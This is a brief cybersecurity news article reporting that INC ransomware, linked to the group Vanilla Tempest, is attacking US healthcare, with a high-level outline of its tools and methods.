INC ransomware hits US healthcare, linked to Vanilla Tempest

September 20, 2024
Vanilla Tempest Cybercriminals US Healthcare Sector INC Ransomware

A financially motivated cyberattack targeting the US healthcare industry has been discovered utilising a recently discovered ransomware strain called INC. This ransomware has been connected to a known threat actor previously identified as DEV-0832 and tracked as ‘Vanilla Tempest.’

According to security experts, Vanilla Tempest is orchestrating these attacks by leveraging infections from GootLoader, a notorious malware family deployed by the group known as Storm-0494. Once the initial infection is established, the attackers deploy tools such as the Supper backdoor, the AnyDesk remote monitoring and management (RMM) tool, and the MEGA file synchronisation platform to carry out their malicious activities. These tools help facilitate their control over compromised systems and allow them to infiltrate networks further.

Following the initial breach, the attackers move laterally within the network using Remote Desktop Protocol (RDP) and the Windows Management Instrumentation (WMI) Provider Host to drop the INC ransomware payload. This tactic enables the attackers to spread the ransomware across the infected network while avoiding detection.

 

Vanilla Tempest has been actively targeting several industries since at least July 2022, including healthcare, education, IT, and manufacturing.

 

The group has previously used well-known ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida in their operations. Vanilla Tempest, also identified by some researchers as Vice Society, is notable for its approach of reusing existing ransomware lockers rather than developing custom malware from scratch.

In addition to these findings, other cybercriminal groups like BianLian and Rhysida have been observed using legitimate cloud-based tools to exfiltrate sensitive data. These groups have repurposed Microsoft’s Azure Storage Explorer and AzCopy tools—typically used for managing Azure cloud storage—to transfer large amounts of stolen data undetected to external cloud storage.

Security experts emphasise the importance of vigilance, especially for industries like healthcare, where cyberattacks can have severe consequences. As attackers continue to improve their tactics, organisations are urged to strengthen their defences and prepare for the ongoing threat of large-scale ransomware attacks.

About the author

Leave a Reply